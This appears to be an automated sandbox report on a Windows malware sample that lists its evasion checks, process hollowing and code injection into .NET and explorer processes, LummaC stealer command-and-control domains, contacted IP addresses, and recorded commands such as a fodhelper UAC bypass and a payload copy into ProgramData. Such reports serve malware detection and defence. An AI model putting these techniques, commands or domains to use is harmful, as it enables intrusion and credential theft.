Source: C:\Users\user\Desktop\W73PCbSH71.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	System information queried: CodeIntegrityInformation

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\7D14.exe

Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\W73PCbSH71.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process queried: DebugObjectHandle

Source: C:\Users\user\AppData\Local\Temp\907.exe

Code function: 6_2_6F8D948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_6F8D948B

Source: C:\Users\user\AppData\Local\Temp\907.exe

Code function: 6_2_6F88B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

6_2_6F88B6C0

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00550042 push dword ptr fs:[00000030h]	14_2_00550042
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0058CD1B push dword ptr fs:[00000030h]	14_2_0058CD1B
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Code function: 15_2_029D50A3 push dword ptr fs:[00000030h]	15_2_029D50A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00441440 mov eax, dword ptr fs:[00000030h]	21_2_00441440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00441440 mov eax, dword ptr fs:[00000030h]	21_2_00441440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043B7C0 mov eax, dword ptr fs:[00000030h]	21_2_0043B7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043B7C0 mov eax, dword ptr fs:[00000030h]	21_2_0043B7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043B780 mov eax, dword ptr fs:[00000030h]	21_2_0043B780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043B7A0 mov ecx, dword ptr fs:[00000030h]	21_2_0043B7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00440C22 mov eax, dword ptr fs:[00000030h]	21_2_00440C22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00440C22 mov eax, dword ptr fs:[00000030h]	21_2_00440C22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004413F0 mov ecx, dword ptr fs:[00000030h]	21_2_004413F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004414C0 mov eax, dword ptr fs:[00000030h]	21_2_004414C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004414C0 mov eax, dword ptr fs:[00000030h]	21_2_004414C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043C550 mov eax, dword ptr fs:[00000030h]	21_2_0043C550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043C550 mov ecx, dword ptr fs:[00000030h]	21_2_0043C550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043C550 mov eax, dword ptr fs:[00000030h]	21_2_0043C550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00441660 mov eax, dword ptr fs:[00000030h]	21_2_00441660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00441780 mov eax, dword ptr fs:[00000030h]	21_2_00441780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004418E5 mov eax, dword ptr fs:[00000030h]	21_2_004418E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004418E5 mov eax, dword ptr fs:[00000030h]	21_2_004418E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043C990 mov ecx, dword ptr fs:[00000030h]	21_2_0043C990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043C990 mov eax, dword ptr fs:[00000030h]	21_2_0043C990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00440CD7 mov eax, dword ptr fs:[00000030h]	21_2_00440CD7

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 14_2_0041B7D2 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

14_2_0041B7D2

Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8D948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6F8D948B
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8DB144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6F8DB144
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00401154 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00401154
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00413A4F __NMSG_WRITE,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00413A4F
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0040AC1C SetUnhandledExceptionFilter,	14_2_0040AC1C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00402E42 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00402E42

Source: C:\Users\user\AppData\Local\Temp\907.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: jfhrjta.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.217.163.105 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.215.113.68 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.42.65.125 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.192.141.1 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.130.138 80	Jump to behavior

.NET source code references suspicious native API functions

Source: 617D.exe.1.dr, Redist.cs	Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 617D.exe.1.dr, Redist.cs	Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array5[i]))
Source: 617D.exe.1.dr, Redist.cs	Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\907.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 14_2_00550110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

14_2_00550110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\W73PCbSH71.exe	Thread created: C:\Windows\explorer.exe EIP: 33E1970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Thread created: unknown EIP: 8741970	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Thread created: unknown EIP: 9CD1930

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\907.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Memory written: C:\Users\user\AppData\Local\Temp\toolspub2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 3FF8.exe, 00000012.00000002.2069333603.00000000042B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: chincenterblandwka.pw
Source: 3FF8.exe, 00000012.00000002.2069333603.00000000042B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: politefrightenpowoa.pw
Source: 3FF8.exe, 00000012.00000002.2069333603.00000000042B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: opposesicknessopw.pw
Source: 4BEF.exe, 0000001C.00000002.2229056404.0000000003479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cakecoldsplurgrewe.pw
Source: 4BEF.exe, 0000001C.00000002.2229056404.0000000003479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reviveincapablewew.pw
Source: 4BEF.exe, 0000001C.00000002.2229056404.0000000003479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ratefacilityframw.fun
Source: 4BEF.exe, 0000001C.00000002.2229056404.0000000003479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: neighborhoodfeelsa.fun
Source: 4BEF.exe, 0000001C.00000002.2229056404.0000000003479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dayfarrichjwclik.fun
Source: 4BEF.exe, 0000001C.00000002.2229056404.0000000003479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: soupinterestoe.fune

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\W73PCbSH71.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jfhrjta	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\907.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\907.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A6A008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 448000
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45A000
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B4B008
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44E000
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 452000
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 469000
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10B9008

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp

Code function: 24_2_00477108 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

24_2_00477108

Source: C:\Users\user\AppData\Local\Temp\907.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\tuc4.exe "C:\Users\user\AppData\Local\Temp\tuc4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Process created: C:\Users\user\AppData\Local\Temp\etopt.exe "C:\Users\user\AppData\Local\Temp\etopt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\617D.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\dialer.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\9234.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\net.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp

Code function: 24_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

24_2_0042DFC4

Source: BroomSetup.exe, 00000010.00000000.2046828797.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	Binary or memory string: Shell_TrayWndSVW
Source: explorer.exe, 00000001.00000000.1675459692.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1678371754.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1676549116.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1675459692.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1675217298.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1675459692.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1675459692.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager
Source: BroomSetup.exe, 00000010.00000000.2046828797.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV

Source: C:\Users\user\AppData\Local\Temp\907.exe

Code function: 6_2_6F8D84B0 cpuid

6_2_6F8D84B0

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	14_2_0040A95A
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	14_2_00417103
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: EnumSystemLocalesA,	14_2_004171C6
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	14_2_004171F0
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	14_2_00415191
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,	14_2_0041D19B
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	14_2_00417257
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	14_2_00414AF0
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	14_2_00417293
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	14_2_004153E9
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoW,	14_2_00413B87
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	14_2_00413BA0
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	14_2_00413C0A
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,	14_2_0041C4C7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	14_2_00413D49
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	14_2_00416D0E
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	14_2_00416E25
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	14_2_004156AF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	14_2_00416EBD
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	14_2_00416F31
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: GetLocaleInfoA,	19_2_004051FC
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: GetLocaleInfoA,	19_2_00405248
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: GetLocaleInfoA,	24_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: GetLocaleInfoA,	24_2_004085BC

Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\dialer.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\9234.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Source: C:\Users\user\AppData\Local\Temp\907.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\907.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
